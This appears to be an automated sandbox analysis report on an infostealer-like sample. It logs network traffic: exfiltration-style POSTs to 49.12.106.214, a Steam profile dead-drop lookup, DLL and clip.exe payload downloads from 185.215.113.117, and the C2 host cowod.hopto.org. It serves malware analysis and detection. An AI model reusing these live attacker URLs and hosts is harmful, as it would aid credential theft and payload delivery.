00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /inc/clip.exe HTTP/1.1Host: 185.215.113.117Connection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                        Source: Joe Sandbox ViewIP Address: 185.215.113.117 185.215.113.117
                        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                        Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                        Source: Joe Sandbox ViewASN Name: LIFELINK-ASRU LIFELINK-ASRU
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49764 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49775 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49802 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49793 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49812 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49822 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49835 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49847 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49868 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49882 -> 49.12.106.214:443
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49874 -> 185.215.113.117:80
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 6649Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 130585Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nholman/ HTTP/1.1User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/74.0.3729.169Safari/537.36Host: 185.215.113.117Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5769Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: unknownTCP traffic detected without corresponding DNS query: 49.12.106.214
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,4_2_00406963
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /inc/clip.exe HTTP/1.1Host: 185.215.113.117Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nholman/ HTTP/1.1User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/74.0.3729.169Safari/537.36Host: 185.215.113.117Cache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                        Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Http://cowod.hopto.orgCGD
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exe
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exe2kkkkm-data;
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exeDisposition:
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/clip.exeZ
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp, clip[1].exe.4.drString found in binary or memory: http://185.215.113.117/nholman/
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/1~
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/L
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/x
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/ystem32
                        Source: cmd.exe, 0000000C.00000002.2908281971.0000000002C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/nholman/~
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.FBKEBGDGHCGD
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.DGHCGD
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                        Source: InstallUtil.exe, 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgCGD
                        Source: 7AeSqNv1rC.exe, 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoGDGHCGD
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
